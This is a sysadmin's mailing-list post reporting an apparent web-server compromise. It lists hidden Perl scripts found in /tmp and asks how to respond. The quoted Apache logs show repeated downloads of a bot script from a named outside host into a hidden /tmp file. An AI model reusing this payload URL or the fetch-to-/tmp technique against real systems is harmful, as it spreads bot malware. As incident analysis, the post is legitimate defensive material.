Am I Compromised -- Some interesting findings
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Here's what I found out more digging in the logs.
There are 3 hidden files (attached with this message) in /tmp/:
1) .fuhrer
2) .fuhrer2
3) .fuhrer3
ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt 5 root root 4096 Nov 25 07:46 .
drwxr-xr-x 26 root root 4096 Nov 25 04:49 ..
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt 2 root root 4096 Nov 21 23:32 .X11-unix
- -rw-r--r-- 1 www-data www-data 3673 Nov 25 00:30 .fuhrer
- -rw-r--r-- 1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
- -rw-r--r-- 1 www-data www-data 0 Nov 25 08:10 .fuhrer3
- -rw------- 1 www-data www-data 71 Nov 23 03:28
sess_07f541a848d0dd70fc87c3aed1691c87
- -rw------- 1 www-data www-data 864 Nov 23 01:55
sess_8092654d49176bb860dca7fad5f50cce
- -rw------- 1 www-data www-data 342 Nov 22 23:56
sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx 3 www-data www-data 4096 Nov 23 01:28 yappa-ng_cache
All these 3 are perl scripts, so now it is clear that there are the perl
scripts which are running from within apache (I've enabled mod_perl in my
apache installation) and eating up the cpu cycles.
Now let's look a little of /var/log/apache2/error.log:
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.37
KB/s
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
- --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 211.06
KB/s
08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
- --08:07:40-- http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
=> `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]
0K .......... ........ 100% 210.52
KB/s
The logs show that the guy uploaded the files to /tmp and hid them.
In my first mail, the logs showed a lot of "sh" defunct processes executed
from within apache. Is this an attempt to gain the shell through the web
server ?
Please suggest me what more should I look for and how to tackle this attack.
Regards,
rrs
- --
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDhz7x4Rhi6gTxMLwRAjkkAJ0TtDpyPiPthcflIolTla6raNa8RwCfUFoz
xuWEZxq7++XqGKsGIUj5MhA=
=bBnm
-----END PGP SIGNATURE-----
Reply to: